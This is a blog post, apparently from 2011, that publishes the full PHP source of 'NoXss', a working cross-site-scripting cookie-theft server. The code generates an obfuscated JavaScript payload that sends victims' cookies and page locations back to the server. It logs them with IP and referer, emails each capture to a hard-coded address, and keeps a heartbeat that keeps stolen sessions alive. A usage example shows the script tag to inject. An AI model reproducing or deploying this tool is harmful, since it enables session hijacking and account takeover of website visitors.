NoXss Vol1.0 

<?php 
error_reporting(0); 
date_default_timezone_set('Asia/Shanghai');  

// SETTING
$password = ''; // PASSWORD OF DOUBLE MD5
$smtpserver = 'smtp.mail.yahoo.com.cn'; // SMTP SERVICE
$smtpserverport = 25; // SMTP PORT
$smtpusermail = 'noevilsparrow@yahoo.cn'; // SMTP USER
$smtpemailto = 'inoevil@qq.com'; // SENT TO
$smtpuser = 'noevilsparrow@yahoo.cn'; // SMTP USER
$smtppass = ''; // SMTP PASS


// INIT
$shell = $_SERVER ['HTTP_HOST'].$_SERVER['PHP_SELF'];
$path = substr($shell, 0, strrpos($_SERVER ['HTTP_HOST'].$_SERVER['PHP_SELF'], '/'));

if(!file_exists('cookie') && !is_dir('cookie'))
{
	mkdir('cookie',0777);
}
else if(!file_exists('session') && !is_dir('session'))
{
	mkdir('session',0777);
}
else if(!file_exists('mail.php'))
{
	AppGetClass('https://files.cnblogs.com/noevil/class.mail.js');
}
include ('mail.php');


// GET ACTION
if (isset($_GET['cookie']))
{
	// GET XSS COOKIE INFO
	$xss_hash = md5($xss_ip);
	$xss_date = date('Y/m/d H:i:s'); 
	$xss_ip = getenv ('REMOTE_ADDR'); 
	$xss_location = $_GET['location'];
	$xss_referer = getenv('HTTP_REFERER');
	$xss_cookie = $_GET['cookie']; 
	
	AppSaveXss($xss_hash, $xss_date, $xss_ip, $xss_location, $xss_referer, $xss_cookie);

	// SEND MAIL
	global $shell;
	$contents = '
		<p>Date : '.$xss_date.'</p>
		<p>IP : '.$xss_ip.'</p>
		<p>Location : '.$xss_location.'</p>
		<p>Referer : '.$xss_referer.'</p>
		<p>Cookie : '.$xss_cookie.'</p>
		<p>Hash : '.md5($xss_ip).'</p>
		<p>NoXss : '.$shell.'</p>
	';
	AppSendMail('A Xss Info Had Got!' ,$contents);
}
else if (isset($_GET['session']))
{
	// KEEP SESSION
	$xss_cookie = $_GET['session']; 
	AppKeepSession($xss_ip); 
}
else if ($_GET['act'] == 'js')
{
	// RECREATE XSS.JS
	if (AppCheck($password)) AppCreateJs(); 
}
else if ($_GET['act'] == 'view')
{
	// VIEW NOC LIST
	if (AppCheck($password)) AppReadNox(); 
}
else if ($_GET['act'] == 'del')
{
	// DELETE NOC FILE
	if (AppCheck($password)) AppDelNox(); 
}
else
{
	// CHECK LOGIN
	if (AppCheck($password)) AppViewXss();
}

// CHECK LOGIN
function AppCheck($_p)
{
	$pwd = $_GET['pass'];
	if (md5(md5($pwd)) != $_p)
	{
		echo 'Fuck You!';
	}
	else
	{
		return true;
	}
}

// SAVE XSS
function AppSaveXss($_h, $_d, $_i, $_l, $_r, $_c)
{
	$fp = fopen('./cookie/'.date("Y-m-d-H-i-s").'.noc', 'a'); 
	fwrite($fp, $_h."\r\n");
	fwrite($fp, 'Date: '.$_d."\r\n");
	fwrite($fp, 'IP: '.$_i."\r\n");
	fwrite($fp, 'Location: '.$_l."\r\n");
	fwrite($fp, 'Referer: '.$_r."\r\n");		
	fwrite($fp, 'Cookie: '.$_c);
	fclose($fp);
}

// SEND MAIL 
function AppSendMail($_t, $_c)
{
	global $smtpserver;
	global $smtpserverport;
	global $smtpusermail;
	global $smtpemailto;
	global $smtpuser;
	global $smtppass;

	$smtp = new smtp($smtpserver, $smtpserverport, true, $smtpuser, $smtppass);
	$smtp->debug = FALSE;
	$smtp->sendmail($smtpemailto, $smtpusermail, $_t, $_c, 'HTML');
}

// VIEW OUTPUT
function AppViewXss()
{
	global $smtpusermail;
	global $smtpemailto;
	
	// OUTPUT HEADER
	print_r('
	<HTML>
	<HEAD>
	<TITLE>NoXss</TITLE>
	<STYLE type="text/css">
	body,th,td {
		font:12px Verdana,Tahoma,sans-serif;
		color:black;
		line-height:140%;
	}
	.info li {
		line-height:35px;
		border-bottom:1px dashed #DDD;
		border-bottom-width:1px;
		border-bottom-style:dashed;
		border-bottom-color:#DDD;
		clear:both;
	}
	th {
		font-weight:bold;
		text-align:left;
	}
	th,td {
		line-height:35px;
		border-bottom:1px dashed #DDD;
		border-bottom-width:1px;
		border-bottom-style:dashed;
		border-bottom-color:#DDD;
		clear:both;
	}
	ul,ol {
		list-style:none;
		list-style-type:none;
		list-style-position:initial;
		list-style-image:initial;
	}
	li {
		display:list-item;
	}
	</STYLE>
	</HEAD>
	<BODY>
	');

	print_r('<ul class="info">');
	
	// OUTPUT SIMPLE INFO
	global $path;
	$noc = AppGetNox('cookie');
	
	print_r('
	<li><h1>NoXss</h1></li>
	<li>
	Date: <font color="#CC0000">'.date('Y/m/d H:i:s').' </font>
	Host: <font color="#CC0000">'.$_SERVER['HTTP_HOST'].' ('.gethostbyname($_SERVER['SERVER_NAME']).') </font>
	Count: <font color="#CC0000">'.count($noc).' </font>
	</li>
	<li>
	SEND USER: <font color="#CC0000">'.$smtpusermail.' </font>
	SEND TO: <font color="#CC0000">'.$smtpemailto.' </font>
	</li>
	<li>Use Example: <font color="#CC0000"><SCRIPT SRC="HTTP://'.$path.'/xss.js"></SCRIPT> </font>
	[<a href="http://'.$_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI'].'&act=js">Creat Js</a>]</li>
	');
	
	// OUTPUT TABLE HEADER
	print_r('
	<li>
	<table>
	<tr>
	<th width="180px">Name</th>
	<th width="200px">Date</th>
	<th width="150px">Ip </th>
	<th width="420px">Referer</th>
	<th width="100px">Status</th>
	<th width="100px">Action</th>
	</tr>	
	');
	
	// OUTPUT NOC LIST
	for ($i=count($noc)-1; $i>=0; $i--)
	{
		// READ NOC FILE
		$nocfile = file('./cookie/'.$noc[$i].'.noc');
		$j = 0;
		foreach($nocfile as &$line)
		{
			$nocdata[$j] = $line;
			$j++;
		}
	
		print_r('
		<tr>
		<td>['.$noc[$i].']</td>
		<td>'.$nocdata[1].'</td>
		<td>'.$nocdata[2].'</td>
		<td title="'.$nocdata[4].'">'.AppSubStr($nocdata[4], 0, 55).'</td>
		<td>'.AppCheckStatus($nocdata[0]).'</td>
		<td>[
		<a href="http://'.$_SERVER['SERVER_NAME'].$_SERVER["REQUEST_URI"].'&act=view&noc='.$noc[$i].'" target="_blank">
		<font color="#ff6600">View</font></a> | 
		<a href="http://'.$_SERVER['SERVER_NAME'].$_SERVER["REQUEST_URI"].'&act=del&noc='.$noc[$i].'">
		<font color="#ff6600">Delete</font></a>
		]</td>
		</tr>
		');
	}
	
	// OUTPUT FOOTER
	print_r('
	</table></li>
	<li><font color="#DDDDDD">Code By : NoevilSparrow @:no3er@qq.com Version: 1.0</font></li>
	</ul></BODY></HTML>
	');
}

// KEEP SESSION
function AppKeepSession($_c)
{
	$session_hash = md5($_c);
	
	// CLEAN SESSION
	if (!is_dir('session/'.date('YmdH')))
	{
		// CREATE FOLDER AND DELETE OTHERS
		mkdir('session/'.date('YmdH'));
		$handle = @opendir('./session/');
		for ($i=0; $dir = @readdir($handle); $i++)
		{ 
			if (@is_dir('./session/'.$dir) && $dir!='.' && $dir!='..')
			{
				if ($dir != date('YmdH'))
				{
					AppCleanSession('./session/'.$dir);
				}
			}				
		} 
		closedir($handle);
	}
	
	// RECORD SESSION
	if (!file_exists('./session/'.date('YmdH').'/'.$session_hash.'.nos'))
	{
		$fp = fopen('./session/'.date('YmdH').'/'.$session_hash.'.nos', 'a'); 
		fwrite($fp, $session_hash);
		fclose($fp);
	}
	
}

// CLEAN SESSION
function AppCleanSession($_d) 
{
	$dh = opendir($_d);
	while ($file = readdir($dh)) 
	{
		if($file!='.' && $file!='..') 
		{
			$fullpath =	$_d.'/'.$file;
			if(!is_dir($fullpath)) 
			{
				unlink($fullpath);
			} 
			else 
			{
				AppCleanSession($fullpath);
			}
		}
	}
	closedir($dh);
	
	if(rmdir($_d)) 
	{
		return true;
	} 
	else 
	{
		return false;
	}
}

// CHECK STATUS
function AppCheckStatus($_h)
{
	$_h = trim($_h);
	if (file_exists('./session/'.date('YmdH').'/'.$_h.'.nos'))
	{
		return '<font color="#006600">Keeping</font>';
	}
	else
	{
		return '<font color="#0000FF">Lost</font>';
	}
}

// READ NOC LIST
function AppGetNox($_p)
{
	if (is_dir($_p))
    {
        if ($handle = opendir($_p))
        {
			for ($i=0; ($file = readdir($handle)) !== false; )
            {
                if($file != "." && $file != ".." && $file != "Thumbs.db")
                {
					$temp = explode('.',$file);
					$_r[$i]	= $temp[0];
					$i++;
                }
            }
            closedir($handle);
        }
    }
	
	return $_r;
}

// DOWNLOAD MAIL CLASS
function AppGetClass($_u)
{         
	$file = fopen ($_u, 'rb');         
	if ($file) 
	{         
		$fp = fopen('mail.php', 'wb');         
		if ($fp)         
		while(!feof($file)) 
		{         
			fwrite($fp, fread($file, 1024*8 ), 1024*8);         
		}         
	}         
	if ($file) 
	{         
		fclose($file);         
	}         
	if ($fp) 
	{         
		fclose($fp);
	}
}

// RE CREATE XSS.JS
function AppCreateJs()
{
	global $shell;
	$fp = fopen('xss.js', 'w'); 
	fwrite($fp, 'var _u = "http://'.$shell.'";');
	fwrite($fp, 'eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!\'\'.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return\'\\\\w+\'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp(\'\\\\b\'+e(c)+\'\\\\b\',\'g\'),k[c])}}return p}(\'1 6="3="+9(b.3)+"&8="+l.8;1 i="m="+9(b.3);1 0=a 7();1 2=a 7();5();e();4 5(){0.c("j",k+"?"+6,g);0.h(d);p 0}4 f(){2.c("j",k+"?"+i,g);2.h(d)}4 e(){n.q("f()",o)}\',27,27,\'_hc|var|_hs|cookie|function|C|_c|XMLHttpRequest|location|escape|new|document|open|null|K|S|true|send|_s|GET|_u|top|session|window|60000|delete|setInterval\'.split(\'|\'),0,{}))
	');
	fclose($fp);
	print_r('<script type="text/javascript">history.back();</script>');
	
}

// STRING SUB
function AppSubStr($_s, $_f, $_l = null)
{
    preg_match_all('/./u', $_s, $match);
    $strlength = count($match[0]);

    if (is_null($_l) || $strlength < $_l) 
	{
        $result = implode('', array_slice($match[0], $_f));
    } 
	else 
	{
        $result = implode('', array_slice($match[0], $_f, $_l)).'...';
    }
    return $result;
}

// READ NOC FILE
function AppReadNox()
{	
	$nocfile = file('./cookie/'.$_GET['noc'].'.noc');
	foreach($nocfile as &$line)
	{
		print_r($line.'<br>');
	}
}

// DELETE NOC FILE
function AppDelNox()
{
	if (!unlink('./cookie/'.$_GET['noc'].'.noc'))
	{
		print_r('<script type="text/javascript">alert("What is the fuck!");history.back();</script>');
	}
	else
	{
		print_r('<script type="text/javascript">top.location="'.getenv('HTTP_REFERER').'";</script>');
	}
}

?>

  

posted @ 2011-08-11 03:48  noevil  阅读(464)  评论(0编辑  收藏  举报